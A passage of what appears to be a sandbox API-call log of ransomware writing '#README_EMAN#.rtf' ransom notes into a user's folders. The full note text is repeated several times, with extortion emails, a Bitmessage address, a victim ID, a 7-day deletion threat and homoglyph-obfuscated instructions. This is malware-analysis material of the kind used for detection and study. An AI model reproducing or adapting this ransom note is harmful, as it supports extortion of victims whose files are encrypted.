n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0286.480] WriteFile (in: hFile=0x2f0, lpBuffer=0x2460ba8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2460ba8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0286.481] CloseHandle (hObject=0x2f0) returned 1 [0286.481] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\#readme_eman#.rtf")) returned 0xffffffff [0286.481] GetLastError () returned 0x2 [0286.481] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0286.482] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.482] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.482] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2460ba8, 